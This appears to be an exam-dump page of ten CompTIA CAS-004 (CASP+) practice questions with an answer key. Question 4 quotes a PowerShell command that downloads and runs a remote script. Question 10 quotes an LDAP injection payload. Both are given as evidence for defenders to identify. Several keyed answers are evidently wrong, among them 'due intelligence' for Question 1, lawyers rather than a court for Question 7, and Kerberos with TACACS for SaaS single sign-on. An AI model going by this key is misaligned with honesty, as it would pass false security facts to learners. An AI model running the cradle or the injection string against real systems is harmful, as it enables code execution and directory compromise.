comptia cas-004 online test

CompTIA Advanced Security Practitioner (CASP+)

What students need to know about the cas-004 exam

  • Total 138 Questions & Answers

Question 1

A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who
are no longer with the organization. The legal department provided the security team with a list of search terms to
investigate.
This is an example of:

  • A. due intelligence
  • B. e-discovery.
  • C. due care.
  • D. legal hold.
Answer:

A

Explanation:
Reference: https://www.ansarada.com/due-diligence/hr

Question 2

A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to
investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.
Which of the following is the NEXT step of the incident response plan?

  • A. Remediation
  • B. Containment
  • C. Response
  • D. Recovery
Answer:

B

Explanation:
Reference: https://www.sciencedirect.com/topics/computer-science/containment-strategy

Question 3

An e-commerce company is running a web server on premises, and the resource utilization is usually less than 30%. During
the last two holiday seasons, the server experienced performance issues because of too many connections, and several
customers were not able to finalize purchase orders. The company is looking to change the server configuration to avoid this
kind of performance issue.
Which of the following is the MOST cost-effective solution?

  • A. Move the server to a cloud provider.
  • B. Change the operating system.
  • C. Buy a new server and create an active-active cluster.
  • D. Upgrade the server with a new one.
Answer:

A

Question 4

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server.
During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell IEX(New-Object Net.WebClient).DownloadString (https://content.comptia.org/casp/whois.psl);whois
Which of the following security controls would have alerted and prevented the next phase of the attack?

  • A. Antivirus and UEBA
  • B. Reverse proxy and sandbox
  • C. EDR and application approved list
  • D. Forward proxy and MFA
Answer:

D

Question 5

The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security
program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?

  • A. Software composition analysis
  • B. Code obfuscation
  • C. Static analysis
  • D. Dynamic analysis
Answer:

D

Question 6

An organization is implementing a new identity and access management architecture with the following objectives:

  • Supporting MFA against on-premises infrastructure
  • Improving the user experience by integrating with SaaS applications
  • Applying risk-based policies based on location
  • Performing just-in-time provisioning

Which of the following authentication protocols should the organization implement to support these requirements?

  • A. Kerberos and TACACS
  • B. SAML and RADIUS
  • C. OAuth and OpenID
  • D. OTP and 802.1X
Answer:

A

Explanation:
Reference: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/migrate-application-authentication-to-azure-active-directory

Question 7

A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?

  • A. Lawyers
  • B. Court
  • C. Upper management team
  • D. Police
Answer:

A

Question 8

A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that
an important legacy embedded system gathers SNMP information from various devices. The system can only be managed
through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the
moment.
Which of the following should the security administrator do to mitigate the risk?

  • A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement.
  • B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management.
  • C. Suggest that the networking team contact the original embedded systems vendor to get an update to the system that does not require Flash.
  • D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
Answer:

D

Question 9

Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel
were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last
backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data
classification is 24 hours.
Based on RPO requirements, which of the following recommendations should the management team make?

  • A. Leave the current backup schedule intact and pay the ransom to decrypt the data.
  • B. Leave the current backup schedule intact and make the human resources fileshare read-only.
  • C. Increase the frequency of backups and create SIEM alerts for IOCs.
  • D. Decrease the frequency of backups and pay the ransom to decrypt the data.
Answer:

C

Question 10

A security analyst discovered that the company's WAF was not properly configured. The main web server was breached,
and the following payload was found in one of the malicious requests:
(&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin))
Which of the following would BEST mitigate this vulnerability?

  • A. Network intrusion prevention
  • B. Data encoding
  • C. Input validation
  • D. CAPTCHA
Answer:

C

Explanation:
Reference: https://book.hacktricks.xyz/pentesting-web/ldap-injection